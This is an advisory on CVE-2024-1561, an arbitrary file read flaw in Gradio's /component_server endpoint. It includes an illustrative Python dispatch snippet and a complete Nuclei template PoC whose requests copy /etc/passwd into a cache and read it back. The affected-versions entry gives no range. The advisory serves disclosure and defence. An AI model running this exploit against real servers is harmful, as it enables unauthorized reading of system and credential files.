Vulnerability Alert | Gradio Arbitrary File Read Vulnerability

0x00 Vulnerability ID
  • CVE-2024-1561

0x01 Severity
  • High

0x02 Overview

Gradio is a Python library for building interactive interfaces for machine learning models. It lets users quickly put a visual, easy-to-use web interface in front of a model without writing any web front-end code.

0x03 Vulnerability Details

CVE-2024-1561
Vulnerability type: arbitrary file read
Impact: disclosure of sensitive information
Summary: Gradio contains an arbitrary file read vulnerability. The /component_server endpoint invokes any method of the Component class with attacker-controlled parameters, so an attacker can call the move_resource_to_block_cache() method of the Block class to copy any file on the filesystem into a temporary directory.
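The root cause is a dispatcher that calls whatever method name the client supplies. The following is an added illustration written for this advisory, not Gradio's own code: the unrestricted pattern beside an allowlisted one. The Component class, the @server marker decorator and both dispatch functions are hypothetical stand-ins.

```python
# Added illustration (not Gradio's code) of client-controlled method dispatch
# versus dispatch restricted to methods explicitly marked as client-callable.
import inspect
from typing import Any, Callable


def server(fn: Callable) -> Callable:
    """Mark a component method as callable from the endpoint.
    Hypothetical decorator; the name is an assumption, not Gradio's API."""
    fn._client_callable = True  # type: ignore[attr-defined]
    return fn


class Component:
    """Constructed stand-in for a Gradio-style component."""

    def __init__(self, cache_dir: str) -> None:
        self.cache_dir = cache_dir

    def move_resource_to_block_cache(self, path: str) -> str:
        # Internal helper. Here it only computes where the file would land in
        # the cache; exposing such a helper to clients is what turns it into an
        # arbitrary file read, because the path is attacker-controlled.
        return f"{self.cache_dir}/{path.lstrip('/').replace('/', '_')}"

    @server
    def preprocess_text(self, data: str) -> str:
        # A method the component legitimately exposes to the front end.
        return data.strip()


def dispatch_unrestricted(component: Component, fn_name: str, data: Any) -> Any:
    """Vulnerable pattern: any attribute name sent by the client gets called."""
    return getattr(component, fn_name)(data)


def dispatch_allowlisted(component: Component, fn_name: str, data: Any) -> Any:
    """Hardened pattern: only bound methods decorated with @server are callable.
    Non-method attributes and unmarked methods are refused before any call."""
    fn = getattr(component, fn_name, None)
    if not inspect.ismethod(fn) or not getattr(fn, "_client_callable", False):
        raise PermissionError(f"{fn_name!r} is not a client-callable method")
    return fn(data)
```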

0x04 Affected Versions
  • Gradio

0x05 POC

id: CVE-2024-1561

info:
  name: Gradio Applications - Local File Read
  author: Diablo
  severity: high
  description: |
    Local file read by calling arbitrary methods of Components class
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read files on the server
  remediation: |
    Update to Gradio 4.13.0
  reference:
    - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
    - https://github.com/DiabloHTB/CVE-2024-1561
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-1561
    cwe-id: CWE-29
    epss-score: 0.00045
    epss-percentile: 0.14639
  metadata:
    verified: true
    max-request: 3
    shodan-query: html:"__gradio_mode__"
  tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /config HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: first-component
        part: body
        group: 1
        json:
          - '.components[0].id'
        internal: true

  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

    extractors:
      - type: regex
        name: tmpath
        regex:
          - \/[a-zA-Z0-9\/]+
        internal: true

  - raw:
      - |
        GET /file={{tmpath}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - 'contains(header, "text/plain")'
        condition: and
https://github.com/projectdiscovery/nuclei-templates/blob/ebfd00e083133f00024652cf3bd44265a4f5074f/http/cves/2024/CVE-2024-1561.yaml
For security research and learning purposes only. Anyone who uses this tool for any other purpose bears all legal and joint liability; the author and publisher assume no legal or joint liability.

0x06 Remediation

The vendor has released a fixed version; users are advised to upgrade to a secure version.
https://www.gradio.app/

